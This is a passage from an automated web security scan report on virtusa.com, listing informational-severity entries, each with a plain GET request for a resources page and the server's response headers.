...[SNIP]...

7.662. http://www.virtusa.com/resources/automated-software-test.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/automated-software-test.asp

Request

GET /resources/automated-software-test.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20101
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.663. http://www.virtusa.com/resources/business-technology-services.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/business-technology-services.asp

Request

GET /resources/business-technology-services.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19513
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.664. http://www.virtusa.com/resources/custom-software-development.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/custom-software-development.asp

Request

GET /resources/custom-software-development.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19164
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.665. http://www.virtusa.com/resources/development-outsourcing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/development-outsourcing.asp

Request

GET /resources/development-outsourcing.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19375
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:02:08 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.666. http://www.virtusa.com/resources/it-application-maintenance.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/it-application-maintenance.asp

Request

GET /resources/it-application-maintenance.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19005
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:02:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.667. http://www.virtusa.com/resources/it-consolidation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/it-consolidation.asp

Request

GET /resources/it-consolidation.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19112
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.668. http://www.virtusa.com/resources/it-consulting-company.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/it-consulting-company.asp

Request

GET /resources/it-consulting-company.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19083
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.669. http://www.virtusa.com/resources/it-consulting-outsourcing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/it-consulting-outsourcing.asp

Request

GET /resources/it-consulting-outsourcing.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19840
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.670. http://www.virtusa.com/resources/it-consulting-services.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/it-consulting-services.asp

Request

GET /resources/it-consulting-services.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19429
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.671. http://www.virtusa.com/resources/it-offshoring.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/it-offshoring.asp

Request

GET /resources/it-offshoring.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19501
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.672. http://www.virtusa.com/resources/lean-it.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/lean-it.asp

Request

GET /resources/lean-it.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18431
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.673. http://www.virtusa.com/resources/offshore-development.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/offshore-development.asp

Request

GET /resources/offshore-development.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19135
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:02:22 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.674. http://www.virtusa.com/resources/offshore-outsourcing-services.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/offshore-outsourcing-services.asp

Request

GET /resources/offshore-outsourcing-services.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19890
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:54 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.675. http://www.virtusa.com/resources/outsource-software-development.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/outsource-software-development.asp

Request

GET /resources/outsource-software-development.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19250
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:01:02 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:01:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.676. http://www.virtusa.com/resources/outsourcing-services.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/outsourcing-services.asp

Request

GET /resources/outsourcing-services.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19618
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.677. http://www.virtusa.com/resources/performance-testing-tools.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/performance-testing-tools.asp

Request

GET /resources/performance-testing-tools.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20354
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.678. http://www.virtusa.com/resources/software-development-company.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/software-development-company.asp

Request

GET /resources/software-development-company.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19166
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:01:10 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:01:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.679. http://www.virtusa.com/resources/software-outsourcing-company.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/software-outsourcing-company.asp

Request

GET /resources/software-outsourcing-company.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19402
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:44 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.680. http://www.virtusa.com/resources/software-test-automation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/software-test-automation.asp

Request

GET /resources/software-test-automation.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20020
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:00:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:00:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.681. http://www.virtusa.com/resources/software-test-management.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/software-test-management.asp

Request

GET /resources/software-test-management.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20766
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:02:20 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.682. http://www.virtusa.com/resources/technology-outsourcing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /resources/technology-outsourcing.asp

Request

GET /resources/technology-outsourcing.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19547
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 16:01:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:01:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...

7.683. http://www.virtusa.com/rssfeeds/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /rssfeeds/default.asp

Request

GET /rssfeeds/default.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15608
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: virtusa=csession=650730749&tid=2324094; expires=Wed, 01-Jun-2011 15:40:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 16:40:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

7.684. http://www.virtusa.com/search/result.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /search/result.asp

Request

GET /search/result.asp HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16525
Content-Type: text/html
